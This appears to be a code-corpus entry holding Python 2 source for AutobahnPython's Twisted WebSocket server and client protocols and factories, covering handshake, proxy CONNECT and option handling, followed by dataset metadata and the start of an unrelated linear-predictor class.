if len(self.data) > 0:
self.consumeData()
def failHandshake(self, reason, code = HTTP_STATUS_CODE_BAD_REQUEST[0], responseHeaders = []):
"""
During opening handshake the client request was invalid, we send a HTTP
error response and then drop the connection.
"""
if self.debug:
log.msg("failing WebSocket opening handshake ('%s')" % reason)
self.sendHttpErrorResponse(code, reason, responseHeaders)
self.dropConnection(abort = False)
def sendHttpErrorResponse(self, code, reason, responseHeaders = []):
"""
Send out HTTP error response.
"""
response = "HTTP/1.1 %d %s\x0d\x0a" % (code, reason.encode("utf-8"))
for h in responseHeaders:
response += "%s: %s\x0d\x0a" % (h[0], h[1].encode("utf-8"))
response += "\x0d\x0a"
self.sendData(response)
def sendHtml(self, html):
"""
Send HTML page HTTP response.
"""
raw = html.encode("utf-8")
response = "HTTP/1.1 %d %s\x0d\x0a" % (HTTP_STATUS_CODE_OK[0], HTTP_STATUS_CODE_OK[1])
if self.factory.server is not None and self.factory.server != "":
response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Content-Type: text/html; charset=UTF-8\x0d\x0a"
response += "Content-Length: %d\x0d\x0a" % len(raw)
response += "\x0d\x0a"
response += raw
self.sendData(response)
def sendRedirect(self, url):
"""
Send HTTP Redirect (303) response.
"""
response = "HTTP/1.1 %d\x0d\x0a" % HTTP_STATUS_CODE_SEE_OTHER[0]
#if self.factory.server is not None and self.factory.server != "":
# response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Location: %s\x0d\x0a" % url.encode("utf-8")
response += "\x0d\x0a"
self.sendData(response)
def sendServerStatus(self, redirectUrl = None, redirectAfter = 0):
"""
Used to send out server status/version upon receiving a HTTP/GET without
upgrade to WebSocket header (and option serverStatus is True).
"""
if redirectUrl:
redirect = """<meta http-equiv="refresh" content="%d;URL='%s'">""" % (redirectAfter, redirectUrl)
else:
redirect = ""
html = """
<!DOCTYPE html>
<html>
<head>
%s
<style>
body {
color: #fff;
background-color: #027eae;
font-family: "Segoe UI", "Lucida Grande", "Helvetica Neue", Helvetica, Arial, sans-serif;
font-size: 16px;
}
a, a:visited, a:hover {
color: #fff;
}
</style>
</head>
<body>
<h1>AutobahnPython %s</h1>
<p>
I am not Web server, but a WebSocket endpoint.
You can talk to me using the WebSocket <a href="http://tools.ietf.org/html/rfc6455">protocol</a>.
</p>
<p>
For more information, please visit <a href="http://autobahn.ws/python">my homepage</a>.
</p>
</body>
</html>
""" % (redirect, __version__)
self.sendHtml(html)
class WebSocketServerFactory(protocol.ServerFactory, WebSocketFactory):
"""
A Twisted factory for WebSocket server protocols.
"""
protocol = WebSocketServerProtocol
"""
The protocol to be spoken. Must be derived from :class:`autobahn.websocket.WebSocketServerProtocol`.
"""
def __init__(self, url = None, protocols = [], server = "AutobahnPython/%s" % __version__, headers = {}, externalPort = None, debug = False, debugCodePaths = False):
"""
Create instance of WebSocket server factory.
Note that you MUST provide URL either here or using
:meth:`autobahn.websocket.WebSocketServerFactory.setSessionParameters`
*before* the factory is started.
:param url: WebSocket listening URL - ("ws:" | "wss:") "//" host [ ":" port ].
:type url: str
:param protocols: List of subprotocols the server supports. The subprotocol used is the first from the list of subprotocols announced by the client that is contained in this list.
:type protocols: list of strings
:param server: Server as announced in HTTP response header during opening handshake or None (default: "AutobahnWebSocket/x.x.x").
:type server: str
:param headers: An optional mapping of additional HTTP headers to send during the WebSocket opening handshake.
:type headers: dict
:param externalPort: Optionally, the external visible port this server will be reachable under (i.e. when running behind a L2/L3 forwarding device).
:type externalPort: int
:param debug: Debug mode (default: False).
:type debug: bool
:param debugCodePaths: Debug code paths mode (default: False).
:type debugCodePaths: bool
"""
self.debug = debug
self.debugCodePaths = debugCodePaths
self.logOctets = debug
self.logFrames = debug
self.trackTimings = False
self.isServer = True
## seed RNG which is used for WS frame masks generation
random.seed()
## default WS session parameters
##
self.setSessionParameters(url, protocols, server, headers, externalPort)
## default WebSocket protocol options
##
self.resetProtocolOptions()
## number of currently connected clients
##
self.countConnections = 0
def setSessionParameters(self, url = None, protocols = [], server = None, headers = {}, externalPort = None):
"""
Set WebSocket session parameters.
:param url: WebSocket listening URL - ("ws:" | "wss:") "//" host [ ":" port ].
:type url: str
:param protocols: List of subprotocols the server supports. The subprotocol used is the first from the list of subprotocols announced by the client that is contained in this list.
:type protocols: list of strings
:param server: Server as announced in HTTP response header during opening handshake.
:type server: str
:param headers: An optional mapping of additional HTTP headers to send during the WebSocket opening handshake.
:type headers: dict
:param externalPort: Optionally, the external visible port this server will be reachable under (i.e. when running behind a L2/L3 forwarding device).
:type externalPort: int
"""
if url is not None:
## parse WebSocket URI into components
(isSecure, host, port, resource, path, params) = parseWsUrl(url)
if path != "/":
raise Exception("path specified for server WebSocket URL")
if len(params) > 0:
raise Exception("query parameters specified for server WebSocket URL")
self.url = url
self.isSecure = isSecure
self.host = host
self.port = port
else:
self.url = None
self.isSecure = None
self.host = None
self.port = None
self.protocols = protocols
self.server = server
self.headers = headers
self.externalPort = externalPort if externalPort is not None else self.port
def resetProtocolOptions(self):
"""
Reset all WebSocket protocol options to defaults.
"""
self.versions = WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS
self.allowHixie76 = WebSocketProtocol.DEFAULT_ALLOW_HIXIE76
self.webStatus = True
self.utf8validateIncoming = True
self.requireMaskedClientFrames = True
self.maskServerFrames = False
self.applyMask = True
self.maxFramePayloadSize = 0
self.maxMessagePayloadSize = 0
self.autoFragmentSize = 0
self.failByDrop = True
self.echoCloseCodeReason = False
self.openHandshakeTimeout = 5
self.closeHandshakeTimeout = 1
self.tcpNoDelay = True
def setProtocolOptions(self,
versions = None,
allowHixie76 = None,
webStatus = None,
utf8validateIncoming = None,
maskServerFrames = None,
requireMaskedClientFrames = None,
applyMask = None,
maxFramePayloadSize = None,
maxMessagePayloadSize = None,
autoFragmentSize = None,
failByDrop = None,
echoCloseCodeReason = None,
openHandshakeTimeout = None,
closeHandshakeTimeout = None,
tcpNoDelay = None):
"""
Set WebSocket protocol options used as defaults for new protocol instances.
:param versions: The WebSocket protocol versions accepted by the server (default: WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS).
:type versions: list of ints
:param allowHixie76: Allow to speak Hixie76 protocol version.
:type allowHixie76: bool
:param webStatus: Return server status/version on HTTP/GET without WebSocket upgrade header (default: True).
:type webStatus: bool
:param utf8validateIncoming: Validate incoming UTF-8 in text message payloads (default: True).
:type utf8validateIncoming: bool
:param maskServerFrames: Mask server-to-client frames (default: False).
:type maskServerFrames: bool
:param requireMaskedClientFrames: Require client-to-server frames to be masked (default: True).
:type requireMaskedClientFrames: bool
:param applyMask: Actually apply mask to payload when mask it present. Applies for outgoing and incoming frames (default: True).
:type applyMask: bool
:param maxFramePayloadSize: Maximum frame payload size that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxFramePayloadSize: int
:param maxMessagePayloadSize: Maximum message payload size (after reassembly of fragmented messages) that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxMessagePayloadSize: int
:param autoFragmentSize: Automatic fragmentation of outgoing data messages (when using the message-based API) into frames with payload length <= this size or 0 for no auto-fragmentation (default: 0).
:type autoFragmentSize: int
:param failByDrop: Fail connections by dropping the TCP connection without performaing closing handshake (default: True).
:type failbyDrop: bool
:param echoCloseCodeReason: Iff true, when receiving a close, echo back close code/reason. Otherwise reply with code == NORMAL, reason = "" (default: False).
:type echoCloseCodeReason: bool
:param openHandshakeTimeout: Opening WebSocket handshake timeout, timeout in seconds or 0 to deactivate (default: 0).
:type openHandshakeTimeout: float
:param closeHandshakeTimeout: When we expect to receive a closing handshake reply, timeout in seconds (default: 1).
:type closeHandshakeTimeout: float
:param tcpNoDelay: TCP NODELAY ("Nagle") socket option (default: True).
:type tcpNoDelay: bool
"""
if allowHixie76 is not None and allowHixie76 != self.allowHixie76:
self.allowHixie76 = allowHixie76
if versions is not None:
for v in versions:
if v not in WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS:
raise Exception("invalid WebSocket protocol version %s (allowed values: %s)" % (v, str(WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS)))
if v == 0 and not self.allowHixie76:
raise Exception("use of Hixie-76 requires allowHixie76 == True")
if set(versions) != set(self.versions):
self.versions = versions
if webStatus is not None and webStatus != self.webStatus:
self.webStatus = webStatus
if utf8validateIncoming is not None and utf8validateIncoming != self.utf8validateIncoming:
self.utf8validateIncoming = utf8validateIncoming
if requireMaskedClientFrames is not None and requireMaskedClientFrames != self.requireMaskedClientFrames:
self.requireMaskedClientFrames = requireMaskedClientFrames
if maskServerFrames is not None and maskServerFrames != self.maskServerFrames:
self.maskServerFrames = maskServerFrames
if applyMask is not None and applyMask != self.applyMask:
self.applyMask = applyMask
if maxFramePayloadSize is not None and maxFramePayloadSize != self.maxFramePayloadSize:
self.maxFramePayloadSize = maxFramePayloadSize
if maxMessagePayloadSize is not None and maxMessagePayloadSize != self.maxMessagePayloadSize:
self.maxMessagePayloadSize = maxMessagePayloadSize
if autoFragmentSize is not None and autoFragmentSize != self.autoFragmentSize:
self.autoFragmentSize = autoFragmentSize
if failByDrop is not None and failByDrop != self.failByDrop:
self.failByDrop = failByDrop
if echoCloseCodeReason is not None and echoCloseCodeReason != self.echoCloseCodeReason:
self.echoCloseCodeReason = echoCloseCodeReason
if openHandshakeTimeout is not None and openHandshakeTimeout != self.openHandshakeTimeout:
self.openHandshakeTimeout = openHandshakeTimeout
if closeHandshakeTimeout is not None and closeHandshakeTimeout != self.closeHandshakeTimeout:
self.closeHandshakeTimeout = closeHandshakeTimeout
if tcpNoDelay is not None and tcpNoDelay != self.tcpNoDelay:
self.tcpNoDelay = tcpNoDelay
def getConnectionCount(self):
"""
Get number of currently connected clients.
:returns: int -- Number of currently connected clients.
"""
return self.countConnections
def startFactory(self):
"""
Called by Twisted before starting to listen on port for incoming connections.
Default implementation does nothing. Override in derived class when appropriate.
"""
pass
def stopFactory(self):
"""
Called by Twisted before stopping to listen on port for incoming connections.
Default implementation does nothing. Override in derived class when appropriate.
"""
pass
class WebSocketClientProtocol(WebSocketProtocol):
"""
Client protocol for WebSocket.
"""
def onConnect(self, connectionResponse):
"""
Callback fired directly after WebSocket opening handshake when new WebSocket server
connection was established.
:param connectionResponse: WebSocket connection response information.
:type connectionResponse: instance of :class:`autobahn.websocket.ConnectionResponse`
"""
pass
def connectionMade(self):
"""
Called by Twisted when new TCP connection to server was established. Default
implementation will start the initial WebSocket opening handshake (or proxy connect).
When overriding in derived class, make sure to call this base class
implementation _before_ your code.
"""
self.isServer = False
WebSocketProtocol.connectionMade(self)
if self.debug:
log.msg("connection to %s established" % self.peerstr)
if not self.isServer and self.factory.proxy is not None:
## start by doing a HTTP/CONNECT for explicit proxies
self.startProxyConnect()
else:
## immediately start with the WebSocket opening handshake
self.startHandshake()
def connectionLost(self, reason):
"""
Called by Twisted when established TCP connection to server was lost. Default
implementation will tear down all state properly.
When overriding in derived class, make sure to call this base class
implementation _after_ your code.
"""
WebSocketProtocol.connectionLost(self, reason)
if self.debug:
log.msg("connection to %s lost" % self.peerstr)
def startProxyConnect(self):
"""
Connect to explicit proxy.
"""
## construct proxy connect HTTP request
##
request = "CONNECT %s:%d HTTP/1.1\x0d\x0a" % (self.factory.host.encode("utf-8"), self.factory.port)
request += "Host: %s:%d\x0d\x0a" % (self.factory.host.encode("utf-8"), self.factory.port)
request += "\x0d\x0a"
if self.debug:
log.msg(request)
self.sendData(request)
def processProxyConnect(self):
"""
Process HTTP/CONNECT response from server.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
http_response_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP response:\n\n%s\n\n" % http_response_data)
## extract HTTP status line and headers
##
(http_status_line, http_headers, http_headers_cnt) = parseHttpHeader(http_response_data)
## validate proxy connect response
##
if self.debug:
log.msg("received HTTP status line for proxy connect request : %s" % str(http_status_line))
log.msg("received HTTP headers for proxy connect request : %s" % str(http_headers))
## Response Line
##
sl = http_status_line.split()
if len(sl) < 2:
return self.failProxyConnect("Bad HTTP response status line '%s'" % http_status_line)
## HTTP version
##
http_version = sl[0].strip()
if http_version != "HTTP/1.1":
return self.failProxyConnect("Unsupported HTTP version ('%s')" % http_version)
## HTTP status code
##
try:
status_code = int(sl[1].strip())
except:
return self.failProxyConnect("Bad HTTP status code ('%s')" % sl[1].strip())
if not (status_code >= 200 and status_code < 300):
## FIXME: handle redirects
## FIXME: handle authentication required
if len(sl) > 2:
reason = " - %s" % ''.join(sl[2:])
else:
reason = ""
return self.failProxyConnect("HTTP proxy connect failed (%d%s)" % (status_code, reason))
## Ok, got complete response for HTTP/CONNECT, remember rest (if any)
##
self.data = self.data[end_of_header + 4:]
## opening handshake completed, move WebSocket connection into OPEN state
##
self.state = WebSocketProtocol.STATE_CONNECTING
## process rest of buffered data, if any
##
if len(self.data) > 0:
self.consumeData()
## now start WebSocket opening handshake
##
self.startHandshake()
def failProxyConnect(self, reason):
"""
During initial explicit proxy connect, the server response indicates some failure and we drop the
connection.
"""
if self.debug:
log.msg("failing proxy connect ('%s')" % reason)
self.dropConnection(abort = True)
def createHixieKey(self):
"""
Supposed to implement the crack smoker algorithm below. Well, crack
probably wasn't the stuff they smoked - dog poo?
http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76#page-21
Items 16 - 22
"""
spaces1 = random.randint(1, 12)
max1 = int(4294967295L / spaces1)
number1 = random.randint(0, max1)
product1 = number1 * spaces1
key1 = str(product1)
rchars = filter(lambda x: (x >= 0x21 and x <= 0x2f) or (x >= 0x3a and x <= 0x7e), range(0,127))
for i in xrange(random.randint(1, 12)):
p = random.randint(0, len(key1) - 1)
key1 = key1[:p] + chr(random.choice(rchars)) + key1[p:]
for i in xrange(spaces1):
p = random.randint(1, len(key1) - 2)
key1 = key1[:p] + ' ' + key1[p:]
return (key1, number1)
def startHandshake(self):
"""
Start WebSocket opening handshake.
"""
## construct WS opening handshake HTTP header
##
request = "GET %s HTTP/1.1\x0d\x0a" % self.factory.resource.encode("utf-8")
if self.factory.useragent is not None and self.factory.useragent != "":
request += "User-Agent: %s\x0d\x0a" % self.factory.useragent.encode("utf-8")
request += "Host: %s:%d\x0d\x0a" % (self.factory.host.encode("utf-8"), self.factory.port)
request += "Upgrade: WebSocket\x0d\x0a"
request += "Connection: Upgrade\x0d\x0a"
## this seems to prohibit some non-compliant proxies from removing the
## connection "Upgrade" header
## See also:
## http://www.ietf.org/mail-archive/web/hybi/current/msg09841.html
## http://code.google.com/p/chromium/issues/detail?id=148908
##
request += "Pragma: no-cache\x0d\x0a"
request += "Cache-Control: no-cache\x0d\x0a"
## optional, user supplied additional HTTP headers
##
for uh in self.factory.headers.items():
request += "%s: %s\x0d\x0a" % (uh[0].encode("utf-8"), uh[1].encode("utf-8"))
## handshake random key
##
if self.version == 0:
(self.websocket_key1, number1) = self.createHixieKey()
(self.websocket_key2, number2) = self.createHixieKey()
self.websocket_key3 = os.urandom(8)
accept_val = struct.pack(">II", number1, number2) + self.websocket_key3
self.websocket_expected_challenge_response = hashlib.md5(accept_val).digest()
## Safari does NOT set Content-Length, even though the body is
## non-empty, and the request unchunked. We do it.
## See also: http://www.ietf.org/mail-archive/web/hybi/current/msg02149.html
request += "Content-Length: %s\x0d\x0a" % len(self.websocket_key3)
## First two keys.
request += "Sec-WebSocket-Key1: %s\x0d\x0a" % self.websocket_key1
request += "Sec-WebSocket-Key2: %s\x0d\x0a" % self.websocket_key2
else:
self.websocket_key = base64.b64encode(os.urandom(16))
request += "Sec-WebSocket-Key: %s\x0d\x0a" % self.websocket_key
## optional origin announced
##
if self.factory.origin:
if self.version > 10 or self.version == 0:
request += "Origin: %s\x0d\x0a" % self.factory.origin.encode("utf-8")
else:
request += "Sec-WebSocket-Origin: %s\x0d\x0a" % self.factory.origin.encode("utf-8")
## optional list of WS subprotocols announced
##
if len(self.factory.protocols) > 0:
request += "Sec-WebSocket-Protocol: %s\x0d\x0a" % ','.join(self.factory.protocols)
## set WS protocol version depending on WS spec version
##
if self.version != 0:
request += "Sec-WebSocket-Version: %d\x0d\x0a" % WebSocketProtocol.SPEC_TO_PROTOCOL_VERSION[self.version]
request += "\x0d\x0a"
if self.version == 0:
## Write HTTP request body for Hixie-76
request += self.websocket_key3
self.http_request_data = request
if self.debug:
log.msg(self.http_request_data)
self.sendData(self.http_request_data)
def processHandshake(self):
"""
Process WebSocket opening handshake response from server.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
self.http_response_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP response:\n\n%s\n\n" % self.http_response_data)
## extract HTTP status line and headers
##
(self.http_status_line, self.http_headers, http_headers_cnt) = parseHttpHeader(self.http_response_data)
## validate WebSocket opening handshake server response
##
if self.debug:
log.msg("received HTTP status line in opening handshake : %s" % str(self.http_status_line))
log.msg("received HTTP headers in opening handshake : %s" % str(self.http_headers))
## Response Line
##
sl = self.http_status_line.split()
if len(sl) < 2:
return self.failHandshake("Bad HTTP response status line '%s'" % self.http_status_line)
## HTTP version
##
http_version = sl[0].strip()
if http_version != "HTTP/1.1":
return self.failHandshake("Unsupported HTTP version ('%s')" % http_version)
## HTTP status code
##
try:
status_code = int(sl[1].strip())
except:
return self.failHandshake("Bad HTTP status code ('%s')" % sl[1].strip())
if status_code != HTTP_STATUS_CODE_SWITCHING_PROTOCOLS[0]:
## FIXME: handle redirects
## FIXME: handle authentication required
if len(sl) > 2:
reason = " - %s" % ''.join(sl[2:])
else:
reason = ""
return self.failHandshake("WebSocket connection upgrade failed (%d%s)" % (status_code, reason))
## Upgrade
##
if not self.http_headers.has_key("upgrade"):
return self.failHandshake("HTTP Upgrade header missing")
if self.http_headers["upgrade"].strip().lower() != "websocket":
return self.failHandshake("HTTP Upgrade header different from 'websocket' (case-insensitive) : %s" % self.http_headers["upgrade"])
## Connection
##
if not self.http_headers.has_key("connection"):
return self.failHandshake("HTTP Connection header missing")
connectionUpgrade = False
for c in self.http_headers["connection"].split(","):
if c.strip().lower() == "upgrade":
connectionUpgrade = True
break
if not connectionUpgrade:
return self.failHandshake("HTTP Connection header does not include 'upgrade' value (case-insensitive) : %s" % self.http_headers["connection"])
## compute Sec-WebSocket-Accept
##
if self.version != 0:
if not self.http_headers.has_key("sec-websocket-accept"):
return self.failHandshake("HTTP Sec-WebSocket-Accept header missing in opening handshake reply")
else:
if http_headers_cnt["sec-websocket-accept"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Accept header appears more than once in opening handshake reply")
sec_websocket_accept_got = self.http_headers["sec-websocket-accept"].strip()
sha1 = hashlib.sha1()
sha1.update(self.websocket_key + WebSocketProtocol._WS_MAGIC)
sec_websocket_accept = base64.b64encode(sha1.digest())
if sec_websocket_accept_got != sec_websocket_accept:
return self.failHandshake("HTTP Sec-WebSocket-Accept bogus value : expected %s / got %s" % (sec_websocket_accept, sec_websocket_accept_got))
## handle "extensions in use" - if any
##
self.websocket_extensions_in_use = []
if self.version != 0:
if self.http_headers.has_key("sec-websocket-extensions"):
if http_headers_cnt["sec-websocket-extensions"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Extensions header appears more than once in opening handshake reply")
exts = self.http_headers["sec-websocket-extensions"].strip()
##
## we don't support any extension, but if we did, we needed
## to set self.websocket_extensions_in_use here, and don't fail the handshake
##
return self.failHandshake("server wants to use extensions (%s), but no extensions implemented" % exts)
## handle "subprotocol in use" - if any
##
self.websocket_protocol_in_use = None
if self.http_headers.has_key("sec-websocket-protocol"):
if http_headers_cnt["sec-websocket-protocol"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Protocol header appears more than once in opening handshake reply")
sp = str(self.http_headers["sec-websocket-protocol"].strip())
if sp != "":
if sp not in self.factory.protocols:
return self.failHandshake("subprotocol selected by server (%s) not in subprotocol list requested by client (%s)" % (sp, str(self.factory.protocols)))
else:
## ok, subprotocol in use
##
self.websocket_protocol_in_use = sp
## For Hixie-76, we need 16 octets of HTTP request body to complete HS!
##
if self.version == 0:
if len(self.data) < end_of_header + 4 + 16:
return
else:
challenge_response = self.data[end_of_header + 4:end_of_header + 4 + 16]
if challenge_response != self.websocket_expected_challenge_response:
return self.failHandshake("invalid challenge response received from server (Hixie-76)")
## Ok, got complete HS input, remember rest (if any)
##
if self.version == 0:
self.data = self.data[end_of_header + 4 + 16:]
else:
self.data = self.data[end_of_header + 4:]
## opening handshake completed, move WebSocket connection into OPEN state
##
self.state = WebSocketProtocol.STATE_OPEN
self.inside_message = False
if self.version != 0:
self.current_frame = None
self.websocket_version = self.version
## we handle this symmetrical to server-side .. that is, give the
## client a chance to bail out .. i.e. on no subprotocol selected
## by server
try:
connectionResponse = ConnectionResponse(self.peer,
self.peerstr,
self.http_headers,
None, # FIXME
self.websocket_protocol_in_use,
self.websocket_extensions_in_use)
self.onConnect(connectionResponse)
except Exception, e:
## immediately close the WS connection
##
self.failConnection(1000, str(e))
else:
## fire handler on derived class
##
if self.trackedTimings:
self.trackedTimings.track("onOpen")
self.onOpen()
## process rest, if any
##
if len(self.data) > 0:
self.consumeData()
def failHandshake(self, reason):
"""
During opening handshake the server response is invalid and we drop the
connection.
"""
if self.debug:
log.msg("failing WebSocket opening handshake ('%s')" % reason)
self.dropConnection(abort = True)
class WebSocketClientFactory(protocol.ClientFactory, WebSocketFactory):
"""
A Twisted factory for WebSocket client protocols.
"""
protocol = WebSocketClientProtocol
"""
The protocol to be spoken. Must be derived from :class:`autobahn.websocket.WebSocketClientProtocol`.
"""
def __init__(self, url = None, origin = None, protocols = [], useragent = "AutobahnPython/%s" % __version__, headers = {}, proxy = None, debug = False, debugCodePaths = False):
"""
Create instance of WebSocket client factory.
Note that you MUST provide URL either here or set using
:meth:`autobahn.websocket.WebSocketClientFactory.setSessionParameters`
*before* the factory is started.
:param url: WebSocket URL to connect to - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param origin: The origin to be sent in WebSocket opening handshake or None (default: None).
:type origin: str
:param protocols: List of subprotocols the client should announce in WebSocket opening handshake (default: []).
:type protocols: list of strings
:param useragent: User agent as announced in HTTP request header or None (default: "AutobahnWebSocket/x.x.x").
:type useragent: str
:param headers: An optional mapping of additional HTTP headers to send during the WebSocket opening handshake.
:type headers: dict
:param proxy: Explicit proxy server to use (hostname:port or IP:port), e.g. "192.168.1.100:8080".
:type proxy: str
:param debug: Debug mode (default: False).
:type debug: bool
:param debugCodePaths: Debug code paths mode (default: False).
:type debugCodePaths: bool
"""
self.debug = debug
self.debugCodePaths = debugCodePaths
self.logOctets = debug
self.logFrames = debug
self.trackTimings = False
self.isServer = False
## seed RNG which is used for WS opening handshake key and WS frame masks generation
random.seed()
## default WS session parameters
##
self.setSessionParameters(url, origin, protocols, useragent, headers, proxy)
## default WebSocket protocol options
##
self.resetProtocolOptions()
def setSessionParameters(self, url = None, origin = None, protocols = [], useragent = None, headers = {}, proxy = None):
"""
Set WebSocket session parameters.
:param url: WebSocket URL to connect to - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param origin: The origin to be sent in opening handshake.
:type origin: str
:param protocols: List of WebSocket subprotocols the client should announce in opening handshake.
:type protocols: list of strings
:param useragent: User agent as announced in HTTP request header during opening handshake.
:type useragent: str
:param headers: An optional mapping of additional HTTP headers to send during the WebSocket opening handshake.
:type headers: dict
"""
if url is not None:
## parse WebSocket URI into components
(isSecure, host, port, resource, path, params) = parseWsUrl(url)
self.url = url
self.isSecure = isSecure
self.host = host
self.port = port
self.resource = resource
self.path = path
self.params = params
else:
self.url = None
self.isSecure = None
self.host = None
self.port = None
self.resource = None
self.path = None
self.params = None
self.origin = origin
self.protocols = protocols
self.useragent = useragent
self.headers = headers
self.proxy = proxy
def resetProtocolOptions(self):
"""
Reset all WebSocket protocol options to defaults.
"""
self.version = WebSocketProtocol.DEFAULT_SPEC_VERSION
self.allowHixie76 = WebSocketProtocol.DEFAULT_ALLOW_HIXIE76
self.utf8validateIncoming = True
self.acceptMaskedServerFrames = False
self.maskClientFrames = True
self.applyMask = True
self.maxFramePayloadSize = 0
self.maxMessagePayloadSize = 0
self.autoFragmentSize = 0
self.failByDrop = True
self.echoCloseCodeReason = False
self.serverConnectionDropTimeout = 1
self.openHandshakeTimeout = 5
self.closeHandshakeTimeout = 1
self.tcpNoDelay = True
def setProtocolOptions(self,
version = None,
allowHixie76 = None,
utf8validateIncoming = None,
acceptMaskedServerFrames = None,
maskClientFrames = None,
applyMask = None,
maxFramePayloadSize = None,
maxMessagePayloadSize = None,
autoFragmentSize = None,
failByDrop = None,
echoCloseCodeReason = None,
serverConnectionDropTimeout = None,
openHandshakeTimeout = None,
closeHandshakeTimeout = None,
tcpNoDelay = None):
"""
Set WebSocket protocol options used as defaults for _new_ protocol instances.
:param version: The WebSocket protocol spec (draft) version to be used (default: WebSocketProtocol.DEFAULT_SPEC_VERSION).
:type version: int
:param allowHixie76: Allow to speak Hixie76 protocol version.
:type allowHixie76: bool
:param utf8validateIncoming: Validate incoming UTF-8 in text message payloads (default: True).
:type utf8validateIncoming: bool
:param acceptMaskedServerFrames: Accept masked server-to-client frames (default: False).
:type acceptMaskedServerFrames: bool
:param maskClientFrames: Mask client-to-server frames (default: True).
:type maskClientFrames: bool
:param applyMask: Actually apply mask to payload when mask it present. Applies for outgoing and incoming frames (default: True).
:type applyMask: bool
:param maxFramePayloadSize: Maximum frame payload size that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxFramePayloadSize: int
:param maxMessagePayloadSize: Maximum message payload size (after reassembly of fragmented messages) that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxMessagePayloadSize: int
:param autoFragmentSize: Automatic fragmentation of outgoing data messages (when using the message-based API) into frames with payload length <= this size or 0 for no auto-fragmentation (default: 0).
:type autoFragmentSize: int
:param failByDrop: Fail connections by dropping the TCP connection without performing closing handshake (default: True).
:type failbyDrop: bool
:param echoCloseCodeReason: Iff true, when receiving a close, echo back close code/reason. Otherwise reply with code == NORMAL, reason = "" (default: False).
:type echoCloseCodeReason: bool
:param serverConnectionDropTimeout: When the client expects the server to drop the TCP, timeout in seconds (default: 1).
:type serverConnectionDropTimeout: float
:param openHandshakeTimeout: Opening WebSocket handshake timeout, timeout in seconds or 0 to deactivate (default: 0).
:type openHandshakeTimeout: float
:param closeHandshakeTimeout: When we expect to receive a closing handshake reply, timeout in seconds (default: 1).
:type closeHandshakeTimeout: float
:param tcpNoDelay: TCP NODELAY ("Nagle") socket option (default: True).
:type tcpNoDelay: bool
"""
if allowHixie76 is not None and allowHixie76 != self.allowHixie76:
self.allowHixie76 = allowHixie76
if version is not None:
if version not in WebSocketProtocol.SUPPORTED_SPEC_VERSIONS:
raise Exception("invalid WebSocket draft version %s (allowed values: %s)" % (version, str(WebSocketProtocol.SUPPORTED_SPEC_VERSIONS)))
if version == 0 and not self.allowHixie76:
raise Exception("use of Hixie-76 requires allowHixie76 == True")
if version != self.version:
self.version = version
if utf8validateIncoming is not None and utf8validateIncoming != self.utf8validateIncoming:
self.utf8validateIncoming = utf8validateIncoming
if acceptMaskedServerFrames is not None and acceptMaskedServerFrames != self.acceptMaskedServerFrames:
self.acceptMaskedServerFrames = acceptMaskedServerFrames
if maskClientFrames is not None and maskClientFrames != self.maskClientFrames:
self.maskClientFrames = maskClientFrames
if applyMask is not None and applyMask != self.applyMask:
self.applyMask = applyMask
if maxFramePayloadSize is not None and maxFramePayloadSize != self.maxFramePayloadSize:
self.maxFramePayloadSize = maxFramePayloadSize
if maxMessagePayloadSize is not None and maxMessagePayloadSize != self.maxMessagePayloadSize:
self.maxMessagePayloadSize = maxMessagePayloadSize
if autoFragmentSize is not None and autoFragmentSize != self.autoFragmentSize:
self.autoFragmentSize = autoFragmentSize
if failByDrop is not None and failByDrop != self.failByDrop:
self.failByDrop = failByDrop
if echoCloseCodeReason is not None and echoCloseCodeReason != self.echoCloseCodeReason:
self.echoCloseCodeReason = echoCloseCodeReason
if serverConnectionDropTimeout is not None and serverConnectionDropTimeout != self.serverConnectionDropTimeout:
self.serverConnectionDropTimeout = serverConnectionDropTimeout
if openHandshakeTimeout is not None and openHandshakeTimeout != self.openHandshakeTimeout:
self.openHandshakeTimeout = openHandshakeTimeout
if closeHandshakeTimeout is not None and closeHandshakeTimeout != self.closeHandshakeTimeout:
self.closeHandshakeTimeout = closeHandshakeTimeout
if tcpNoDelay is not None and tcpNoDelay != self.tcpNoDelay:
self.tcpNoDelay = tcpNoDelay
def clientConnectionFailed(self, connector, reason):
"""
Called by Twisted when the connection to server has failed. Default implementation
does nothing. Override in derived class when appropriate.
"""
pass
def clientConnectionLost(self, connector, reason):
"""
Called by Twisted when the connection to server was lost. Default implementation
does nothing. Override in derived class when appropriate.
"""
pass
|
gpl-3.0
| 8,117,406,587,043,622,000
| 37.000746
| 214
| 0.601589
| false
| 4.298251
| false
| false
| false
|
Calvinxc1/Data_Analytics
|
old versions/analysis_classes/Cluster_Control/Cluster_IO/Predict_Cluster/predictor.py
|
1
|
1655
|
#%% Libraries
import numpy as np
import root_funcs as rf
#%% predict_linear class (Module for Process_Node - Predict)
class predict_linear(object):
__lookup_dict = {
'beta_init': {
'zeros': ('Cluster_Control.Cluster_IO.Predict_Cluster.beta_init', 'beta_zeros')
},
'learn_rate': {
'partial_hessian': ('Cluster_Control.Cluster_IO.Predict_Cluster.Linear.learn_rate', 'partial_hessian'),
'manual': ('Cluster_Control.Cluster_IO.Predict_Cluster.Linear.learn_rate', 'manual')
}
}
__class_type = 'predict_linear'
